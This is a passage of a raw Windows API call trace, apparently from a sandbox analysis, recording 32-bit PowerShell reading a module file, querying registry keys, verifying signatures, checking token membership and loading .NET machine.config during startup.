lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x3000 [0115.589] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x1000, lpOverlapped=0x0) returned 1 [0115.589] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x4000 [0115.590] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x1000, lpOverlapped=0x0) returned 1 [0115.590] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x5000 [0115.590] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x1000, lpOverlapped=0x0) returned 1 [0115.590] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x6000 [0115.590] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x1000, lpOverlapped=0x0) returned 1 [0115.591] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x7000 [0115.591] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x778, lpOverlapped=0x0) returned 1 [0115.591] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x7778 [0115.591] ReadFile (in: hFile=0x418, lpBuffer=0x27e5f04, nNumberOfBytesToRead=0x88, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e5f04*, lpNumberOfBytesRead=0x5a0d52c*=0x0, lpOverlapped=0x0) returned 1 [0115.591] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x7778 [0115.591] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x0, lpOverlapped=0x0) returned 1 [0115.592] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0d494, Length=0x20, ResultLength=0x5a0d504 | out: SystemInformation=0x5a0d494, ResultLength=0x5a0d504*=0x0) returned 0xc0000003 [0115.592] GetSystemInfo (in: lpSystemInfo=0x5a0d510 | out: lpSystemInfo=0x5a0d510*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0115.593] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d4a0 | out: phkResult=0x5a0d4a0*=0x41c) returned 0x0 [0115.593] RegQueryValueExW (in: hKey=0x41c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0d4bc, lpData=0x0, lpcbData=0x5a0d4b8*=0x0 | out: lpType=0x5a0d4bc*=0x0, lpData=0x0, lpcbData=0x5a0d4b8*=0x0) returned 0x2 [0115.593] RegCloseKey (hKey=0x41c) returned 0x0 [0115.593] CloseHandle (hObject=0x418) returned 1 [0115.901] CoCreateGuid (in: pguid=0x5a0d5d4 | out: pguid=0x5a0d5d4*(Data1=0xf58764f4, Data2=0xfe3c, Data3=0x4b2c, Data4=([0]=0xb1, [1]=0xdb, [2]=0xa6, [3]=0x12, [4]=0x3b, [5]=0x69, [6]=0xe5, [7]=0x8d))) returned 0x0 [0115.902] GetCurrentProcess () returned 0xffffffff [0115.903] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0d5a0 | out: TokenHandle=0x5a0d5a0*=0x418) returned 1 [0115.903] GetTokenInformation (in: TokenHandle=0x418, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x5a0d5a0 | out: TokenInformation=0x0, ReturnLength=0x5a0d5a0) returned 0 [0115.904] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6cf9c8 [0115.904] GetTokenInformation (in: TokenHandle=0x418, TokenInformationClass=0x8, TokenInformation=0x6cf9c8, TokenInformationLength=0x4, ReturnLength=0x5a0d5a0 | out: TokenInformation=0x6cf9c8, ReturnLength=0x5a0d5a0) returned 1 [0115.904] LocalFree (hMem=0x6cf9c8) returned 0x0 [0115.904] DuplicateTokenEx (in: hExistingToken=0x418, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x5a0d5a8 | out: phNewToken=0x5a0d5a8*=0x41c) returned 1 [0115.904] CheckTokenMembership (in: TokenHandle=0x41c, SidToCheck=0x2886070*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x5a0d5b8 | out: IsMember=0x5a0d5b8) returned 1 [0115.905] CloseHandle (hObject=0x41c) returned 1 [0115.965] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0d344 | out: lpPerformanceCount=0x5a0d344*=2940077581759) returned 1 [0115.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d030) returned 1 [0115.966] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d2f4 | out: lpFileInformation=0x5a0d2f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0115.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d02c) returned 1 [0115.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0cfc4) returned 1 [0115.966] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d288 | out: lpFileInformation=0x5a0d288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0115.966] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0cfc0) returned 1 [0115.967] CoTaskMemAlloc (cb=0x10) returned 0x5bc79c0 [0115.967] CoTaskMemAlloc (cb=0x10) returned 0x5bc79a8 [0115.967] CoTaskMemAlloc (cb=0xe4) returned 0x696ff8 [0115.967] CoTaskMemAlloc (cb=0x30) returned 0x5bc3db0 [0115.967] WinVerifyTrust () returned 0x800b0100 [0115.979] CoTaskMemFree (pv=0x5bc79c0) [0115.979] CoTaskMemFree (pv=0x5bc3db0) [0115.979] CryptCATHandleFromStore () returned 0x65b4a8 [0115.979] WTHelperGetProvSignerFromChain () returned 0x0 [0115.979] CoTaskMemAlloc (cb=0x10) returned 0x5bc79c0 [0115.979] CoTaskMemAlloc (cb=0x30) returned 0x5bc3db0 [0115.979] WinVerifyTrust () returned 0x0 [0115.980] CoTaskMemFree (pv=0x5bc3db0) [0115.980] CoTaskMemFree (pv=0x5bc79c0) [0115.980] CoTaskMemFree (pv=0x696ff8) [0115.980] CoTaskMemFree (pv=0x5bc79a8) [0115.988] CoCreateGuid (in: pguid=0x5a0d220 | out: pguid=0x5a0d220*(Data1=0x114005cb, Data2=0xd6ef, Data3=0x4e8f, Data4=([0]=0x9a, [1]=0xe2, [2]=0x85, [3]=0xda, [4]=0x75, [5]=0x64, [6]=0x7a, [7]=0xc8))) returned 0x0 [0115.989] CoCreateGuid (in: pguid=0x5a0d220 | out: pguid=0x5a0d220*(Data1=0x50ddd760, Data2=0x1f39, Data3=0x4e6c, Data4=([0]=0x9a, [1]=0x3b, [2]=0x64, [3]=0xc4, [4]=0x71, [5]=0x6c, [6]=0x0, [7]=0x80))) returned 0x0 [0115.990] CoCreateGuid (in: pguid=0x5a0d220 | out: pguid=0x5a0d220*(Data1=0x952b9288, Data2=0x5dea, Data3=0x480e, Data4=([0]=0x8f, [1]=0x8, [2]=0x5e, [3]=0xb7, [4]=0xa5, [5]=0x3b, [6]=0x14, [7]=0xde))) returned 0x0 [0115.990] CoCreateGuid (in: pguid=0x5a0d220 | out: pguid=0x5a0d220*(Data1=0xaa63b4c1, Data2=0xa5c7, Data3=0x4821, Data4=([0]=0xbe, [1]=0xbb, [2]=0x11, [3]=0xd9, [4]=0x1b, [5]=0xf2, [6]=0xd2, [7]=0x57))) returned 0x0 [0115.992] CoCreateGuid (in: pguid=0x5a0d220 | out: pguid=0x5a0d220*(Data1=0x34e386f0, Data2=0x2993, Data3=0x4089, Data4=([0]=0xb4, [1]=0x8, [2]=0x22, [3]=0x6d, [4]=0x7, [5]=0xb7, [6]=0xe4, [7]=0x62))) returned 0x0 [0115.992] CoCreateGuid (in: pguid=0x5a0d220 | out: pguid=0x5a0d220*(Data1=0xad91a008, Data2=0x6b29, Data3=0x49b5, Data4=([0]=0x86, [1]=0xd9, [2]=0x1d, [3]=0x23, [4]=0x6, [5]=0xb1, [6]=0x27, [7]=0x80))) returned 0x0 [0116.108] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e578 | out: phkResult=0x5a0e578*=0x41c) returned 0x0 [0116.109] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x0, lpcbData=0x5a0e594*=0x0 | out: lpType=0x5a0e598*=0x1, lpData=0x0, lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.109] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x2a4e7b8, lpcbData=0x5a0e594*=0x56 | out: lpType=0x5a0e598*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.109] RegCloseKey (hKey=0x41c) returned 0x0 [0116.110] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e578 | out: phkResult=0x5a0e578*=0x41c) returned 0x0 [0116.110] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x0, lpcbData=0x5a0e594*=0x0 | out: lpType=0x5a0e598*=0x1, lpData=0x0, lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.110] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x2a4eacc, lpcbData=0x5a0e594*=0x56 | out: lpType=0x5a0e598*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.110] RegCloseKey (hKey=0x41c) returned 0x0 [0116.110] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e578 | out: phkResult=0x5a0e578*=0x41c) returned 0x0 [0116.111] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x0, lpcbData=0x5a0e594*=0x0 | out: lpType=0x5a0e598*=0x1, lpData=0x0, lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.111] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x2a4edc8, lpcbData=0x5a0e594*=0x56 | out: lpType=0x5a0e598*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.111] RegCloseKey (hKey=0x41c) returned 0x0 [0116.111] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e578 | out: phkResult=0x5a0e578*=0x41c) returned 0x0 [0116.111] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x0, lpcbData=0x5a0e594*=0x0 | out: lpType=0x5a0e598*=0x1, lpData=0x0, lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.111] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x2a4f0d0, lpcbData=0x5a0e594*=0x56 | out: lpType=0x5a0e598*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.111] RegCloseKey (hKey=0x41c) returned 0x0 [0116.112] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e578 | out: phkResult=0x5a0e578*=0x41c) returned 0x0 [0116.112] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x0, lpcbData=0x5a0e594*=0x0 | out: lpType=0x5a0e598*=0x1, lpData=0x0, lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.112] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x2a4f3e4, lpcbData=0x5a0e594*=0x56 | out: lpType=0x5a0e598*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.112] RegCloseKey (hKey=0x41c) returned 0x0 [0116.113] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e578 | out: phkResult=0x5a0e578*=0x41c) returned 0x0 [0116.113] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x0, lpcbData=0x5a0e594*=0x0 | out: lpType=0x5a0e598*=0x1, lpData=0x0, lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.113] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x2a4f6f8, lpcbData=0x5a0e594*=0x56 | out: lpType=0x5a0e598*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.113] RegCloseKey (hKey=0x41c) returned 0x0 [0116.113] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e578 | out: phkResult=0x5a0e578*=0x41c) returned 0x0 [0116.114] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x0, lpcbData=0x5a0e594*=0x0 | out: lpType=0x5a0e598*=0x1, lpData=0x0, lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.114] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e598, lpData=0x2a4f9f4, lpcbData=0x5a0e594*=0x56 | out: lpType=0x5a0e598*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0e594*=0x56) returned 0x0 [0116.114] RegCloseKey (hKey=0x41c) returned 0x0 [0116.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0e5c4 | out: phkResult=0x5a0e5c4*=0x41c) returned 0x0 [0116.115] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e5e4, lpData=0x0, lpcbData=0x5a0e5e0*=0x0 | out: lpType=0x5a0e5e4*=0x1, lpData=0x0, lpcbData=0x5a0e5e0*=0x56) returned 0x0 [0116.115] RegQueryValueExW (in: hKey=0x41c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x5a0e5e4, lpData=0x2a4fd3c, lpcbData=0x5a0e5e0*=0x56 | out: lpType=0x5a0e5e4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x5a0e5e0*=0x56) returned 0x0 [0116.115] RegCloseKey (hKey=0x41c) returned 0x0 [0116.115] CoTaskMemAlloc (cb=0x20c) returned 0x5bca838 [0116.115] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5bca838 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0116.115] CoTaskMemFree (pv=0x5bca838) [0116.115] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0116.116] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0116.263] EtwEventActivityIdControl () returned 0x0 [0116.264] SetEvent (hEvent=0x410) returned 1 [0116.265] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5a0e920*=0x410, lpdwindex=0x5a0e744 | out: lpdwindex=0x5a0e744) returned 0x0 [0116.267] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e8ac, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0116.270] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0116.270] GetFileType (hFile=0xb) returned 0x2 [0116.272] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x5a0ea58 | out: lpMode=0x5a0ea58) returned 1 [0116.272] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0ea18 | out: lpConsoleScreenBufferInfo=0x5a0ea18) returned 1 [0116.273] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0ea18 | out: lpConsoleScreenBufferInfo=0x5a0ea18) returned 1 [0116.317] EtwEventActivityIdControl () returned 0x0 [0116.317] EtwEventActivityIdControl () returned 0x0 [0116.317] EtwEventActivityIdControl () returned 0x0 [0116.400] EtwEventActivityIdControl () returned 0x0 [0116.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x5a0e67c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0116.666] CoTaskMemAlloc (cb=0x20c) returned 0x5bdada0 [0116.666] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5bdada0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0116.667] CoTaskMemFree (pv=0x5bdada0) [0116.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0116.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x3a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0116.677] GetCurrentProcess () returned 0xffffffff [0116.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5a0e9b4 | out: TokenHandle=0x5a0e9b4*=0x41c) returned 1 [0116.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2f [0116.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x2f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0116.681] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5a0e9ac | out: lpFileInformation=0x5a0e9ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0116.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0116.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x44, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0116.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5a0e9b4 | out: lpFileInformation=0x5a0e9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0116.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0116.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x44, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0116.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e8ec) returned 1 [0116.684] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x420 [0116.684] GetFileType (hFile=0x420) returned 0x1 [0116.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e8e8) returned 1 [0116.685] GetFileType (hFile=0x420) returned 0x1 [0116.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 